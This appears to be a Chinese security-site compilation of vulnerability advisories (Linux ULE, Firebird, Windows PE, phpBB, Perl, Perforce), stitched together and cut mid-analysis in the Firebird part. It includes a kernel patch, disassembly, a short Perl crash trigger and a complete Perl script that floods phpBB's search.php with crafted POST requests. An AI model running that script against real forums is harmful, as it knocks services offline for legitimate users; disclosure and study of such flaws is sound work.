下面小编为大家带来Linux Kernel畸形ULE报文处理远程拒绝服务漏洞(共含7篇),希望大家能够受用!同时,但愿您也能像本文投稿人“鹅酱”一样,积极向本站投稿分享好文章。
受影响系统:Linux kernel 2.6.x <= 2.6.17.7不受影响系统:Linux kernel 2.6.17.8描述:
BUGTRAQ ID: 19939CVE(CAN) ID: CVE--4623
Linux Kernel是开放源码操作系统Linux所使用的内核,
Linux的ULE(单向轻型封装RFC 4326)拆封代码存在一个漏洞,远程攻击者可能利用此漏洞对接收处理的服务器造成拒绝服务攻击。
攻击者可以通过发送SNDU长度为0的ULE报文导致漏洞的触发。
<*来源:Ang Way Chuang (wcang@nrg.cs.usm.my)
链接:lkml.org/lkml/2006/8/20/278
*>
建议:
厂商补丁:Linux
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.kernel.org/
diff -uprN linux-2.6.17.8/drivers/media/dvb/dvb-core/dvb_net.c linux-2.6.17.8-fix/drivers/media/dvb/dvb-core/dvb_net.c
--- linux-2.6.17.8/drivers/media/dvb/dvb-core/dvb_net.c 2006-08-07 12:18:54.000000000 +0800
+++ linux-2.6.17.8-fix/drivers/media/dvb/dvb-core/dvb_net.c 2006-08-21 11:09:12.000000000 +0800
@@ -492,7 +492,7 @@ static void dvb_net_ule( struct net_devi
} else
priv->ule_dbit = 0;
- if (priv->ule_sndu_len >32763) {
+ if (priv->ule_sndu_len >32763 || priv->ule_sndu_len < ((priv->ule_dbit) ? 4 : 4 + ETH_ALEN)) {
printk(KERN_WARNING “%lu: Invalid ULE SNDU length %u. ”
“Resyncing.\n”, priv->ts_count, priv->ule_sndu_len);
priv->ule_sndu_len = 0;
受影响系统:
Linux kernel 2.6.x <= 2.6.17.7
不受影响系统:
Linux kernel 2.6.17.8
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19939
CVE(CAN) ID: CVE-2006-4623
Linux Kernel是开放源码操作系统Linux所使用的内核,
Linux Kernel畸形ULE拒绝服务漏洞
,
Linux的ULE(单向轻型封装RFC 4326)拆封代码存在一个漏洞,远程攻击者可能利用此漏洞对接收处理的服务器造成拒绝服务攻击。
攻击者可以通过发送SNDU长度为0的ULE报文导致漏洞的触发。
建议:
--------------------------------------------------------------------------------
厂商补丁:
Linux
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.kernel.org/
/* CSS Document */
Firebird是一款提供多个ANSI SQL-92功能的关系型数据库,可运行在Linux、Windows和各种Unix平台下,
在Firebird的src/remote/server.cpp文件中,process_packet2函数负责处理从客户端发送过来的报文。这个函数有一个switch语句考虑协议中所定义的所有可能的opcode。
/-----------
src/remote/server.cpp:
...
3404 P_OP p = receive->p_operation;
3405 switch (op)
3406 {
3407 case op_connect:
...
3426 case op_compile:
...
3430 case op_attach:
...
- -----------/
在op_connect_request报文的情况下,执行流进入switch语句的以下case:
/-----------
src/remote/server.cpp:
...
3584 case op_connect_request:
3585 aux_request(port, &receive->p_req, sendL);
3586 break;
- -----------/
在调用aux_request()函数并执行break语句后,执行流到达:
/-----------
src/remote/server.cpp:
...
3652 if (port && port->port_state == state_broken) {
3653 if (!port->port_parent) {
3654 gds__log(“SERVER/process_packet: broken port, server exiting”);
3655 port->disconnect(sendL, receive);
3656 ThreadData::restoreSpecific();
3657 return false;
3658 }
3659 port->disconnect(sendL, receive);
3660 port = NULL;
3661 }
- -----------/
通过在接收到op_connect_request报文时调试fbserver.exe二进制程序可以看出满足了第一个if语句的条件,但没有满足第二个if的条件,因此执行流到达port->disconnect()调用:
/-----------
005ACE2C |> 837E 0C 03 CMP DWORD PTR DS:[ESI+C],3
;port->port_state == state_broken ?
005ACE30 |. 75 1B JNZ SHORT fbserver.005ACE4D
005ACE32 |. 837E 1C 00 CMP DWORD PTR DS:[ESI+1C],0
;port->port_parent == 0?
005ACE36 |. 75 0A JNZ SHORT fbserver.005ACE42
;this conditional jump is taken
005ACE38 |. 68 D4D65F00 PUSH fbserver.005FD6D4
; ASCII “SERVER/process_packet: broken port, server exiting”
005ACE3D |.^ E9 44FDFFFF JMP fbserver.005ACB86
005ACE42 |> 53 PUSH EBX
; /Arg2
005ACE43 |. 57 PUSH EDI
; |Arg1
005ACE44 |. 8BCE MOV ECX,ESI
; |
005ACE46 |. E8 65D7FFFF CALL
; /port->disconnect(sendL, receive)
- -----------/
根据src/remote/remote.h中的定义,port的类型为struct rem_port,
这种结构类型在src/remote/server.cpp中实现了disconnect()函数:
/-----------
src/remote/server.cpp:
1464 void rem_port::disconnect(PACKET* sendL, PACKET* receiveL)
- -----------/
在这个函数中执行以下代码以释放发送和接收的报文并关闭相关的套接字:
/-----------
src/remote/server.cpp:
[1] [2] 下一页
影响版本:
Microsoft Windows XP
Microsoft Windows
Microsoft Windows
Microsoft Windows Vista/SP1
Microsoft Windows Server 漏洞描述:
CVE ID:CVE--2516
Windows 是微软发布的流行操作系统,利用构造特殊PE格式的EXE文件,当文件在软盘、可移动设备或者网络共享上都可导致Windows系统蓝屏甚至权限提升。
Windows内核在对访问PE文件时会进行解析处理,由于遍历链表时没有正确判断指针是否为空,一个特殊构造的PE文件可触犯内核的非法内存地址访问,从而造成系统蓝屏或重启,
本地登录用户也可能利用此漏洞提升权限。
当PE文件存放在软盘、U盘或者网络共享服务器上时,使用Explorer浏览相关目录时即可触发漏洞。<*参考
www.nsfocus.net/index.php?act=advisory&do=view&adv_id=49 *>
SEBUG安全建议:
厂商状态:
微软已发布安全公告MS09-058修复此安全漏洞
您可以在下列地址看到微软安全公告的详细内容:
www.microsoft.com/china/technet/security/bulletin/MS09-058.mspx
phpBB远程拒绝服务漏洞
漏洞版本:
phpBB phpBB 3.0.8
phpBB phpBB 3.0.7
phpBB phpBB 3.0.6
phpBB phpBB 3.0.5
phpBB phpBB 3.0.4
phpBB phpBB 3.0.3
phpBB phpBB 3.0.2
phpBB phpBB 3.0.1
phpBB phpBB 3.0
phpBB phpBB 2.0.21
phpBB phpBB 2.0.19
phpBB phpBB 2.0.17
phpBB phpBB 2.0.16
phpBB phpBB 2.0.15
phpBB phpBB 2.0.14
phpBB phpBB 2.0.13
phpBB phpBB 2.0.12
phpBB phpBB 2.0.11
phpBB phpBB 2.0.10
phpBB phpBB 2.0.9
phpBB phpBB 2.0.7
phpBB phpBB 2.0.6
phpBB phpBB 2.0.5
phpBB phpBB 2.0.4
phpBB phpBB 2.0.3
phpBB phpBB 2.0.2
phpBB phpBB 2.0.1
phpBB phpBB 1.4.4
phpBB phpBB 1.4.2
phpBB phpBB 1.4.1
phpBB phpBB 1.2.1
phpBB phpBB 2.0.22
phpBB phpBB 2.0.20
phpBB phpBB 2.0.18
漏洞描述:
Bugtraq ID:65481
phpBB是phpBB组开发的一套开源的使用PHP语言开发的Web论坛软件,该软件具有支持多国语言、支持多种数据库和自定义版面设计等特点。
phpBB中存在远程拒绝服务漏洞。攻击者可利用该漏洞造成受影响应用程序崩溃,拒绝服务合法用户。
<* 参考
www.securityfocus.com/bid/65481
sebug.net/appdir/phpBB
*>
测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
###########################
# Phpbb Forum Denial of Service Vulnerability
###########################
#!/usr/bin/perl
# Iranian Exploit DataBase
# Phpbb Forum Denial of Service Vulnerability
# Version: All Version
# Vendor site : www.phpbb.com
# Code Written By Amir – iedb.team@gmail.com – o0_iedb_0o@yahoo.com
# Site : Www.IeDb.Ir – Www.IrIsT.Ir
# Fb Page :
www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
# Greats : TaK.FaNaR – ErfanMs – Medrik – F@riD – Bl4ck M4n – 0x0ptim0us
- 0Day – Dj.TiniVini – E2MA3N
# l4tr0d3ctism – H-SK33PY – Noter – r3d_s0urc3 – Dr_Evil And All
Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i–)
{
$data =
“securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0″;
$len = length $data;
$foo = “POST “.$dir.”search.php?do=process HTTP/1.1\r\n”.
“Accept: * /*\r\n”.
“Accept-Language: en-gb\r\n”.
“Content-Type: application/x-www-form-urlencoded\r\n”.
“Accept-Encoding: gzip, deflate\r\n”.
“User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n”.
“Host: $host\r\n”.
“Content-Length: $len\r\n”.
“Connection: Keep-Alive\r\n”.
“Cache-Control: no-cache\r\n\r\n”.
“$data”;
my $port = “80″;
my $proto = getprotobyname(‘tcp’);
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,”$foo”, 0);
syswrite STDOUT, “+” ;
}
print “\n\n”;
system(‘ping $host’);
sub usage {
print “\n”;
print “################################################# \n”;
print “## Phpbb Forum Denial of Service Vulnerability\n”;
print “## Discoverd By Amir – iedb.team@gmail.com – Id : o0_iedb_0o \n”;
print “## Www.IeDb.Ir – Www.IrIsT.Ir \n”;
print “################################################# \n”;
print “## [host] [path] \n”;
print “## host.com /forum/\n”;
print “################################################# \n”;
print “\n”;
exit;
};
#####################################
# Archive Exploit = www.iedb.ir/exploits-868.html
#####################################
###########################
# Iranian Exploit DataBase = IeDb.Ir [-11-17]
###########################
安全建议:
目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.phpbb.com/
影响版本:
Larry Wall Perl 5.x
漏洞描述:
Perl 是一种自由且功能强大的编程语言,它被用作 Web 编程、数据库处理、XML 处理以及系统管理等等 ― 它能够完成所有这些工作,同时仍然是处理小的日常工作的完美工具。
Perl “Perl_reg_numbered_buff_fetch()”函数在实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成使用受影响perl代码的应用程序终止运行,拒绝服务合法用户,
<*参考
*>
测试方法:
#!/usr/bin/perl
my @x = (“A=B”,“AAAA=/”);
utf8::upgrade $_ for @x;
$x[1] =~ s{/s*$}{};
for (@x) {
m{^([^=]+?)s*=.+$};
}
厂商补丁:
Larry Wall
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.perl.org/
受影响系统:Perforce Software Perforce Server <= 2007.3/143793描述:--------------------------------------------------------------------------------BUGTRAQ ID: 28108Perforce软件配置管理系统是客户端/服务器架构的SCM工具,用户可通过P
受影响系统:Perforce Software Perforce Server <= 2007.3/143793
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28108
Perforce软件配置管理系统是客户端/服务器架构的SCM工具,用户可通过Perforce客户端软件访问其服务端,
如果客户端请求中缺少某些参数的话,由于Perforce服务器中从报文中获得这些值的函数对返回的指针缺少检查,因此可能会触发空指针引用。这个漏洞影响dm-FaultFile、dm-LazyCheck、dm-ResolvedFile、dm-OpenFile、crypto等命令。
如果客户端向Perforce服务器发送了server-DiffFile和server-ReleaseFile命令的话,就会将客户端所提供的32位数用作数组初始化中的元素数;畸形的server-DiffFile命令会强制服务器限制死循环,导致耗尽所有内存和系统资源后服务终止,
<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:marc.info/?l=bugtraq&m=120475134221716&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
aluigi.org/poc/perforces.zip
建议:
--------------------------------------------------------------------------------
厂商补丁:
Perforce Software
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.perforce.com/
★ FreeBSD I386SetLDT多个本地拒绝服务漏洞
★ Microsoft Windows图形设备接口库拒绝服务漏洞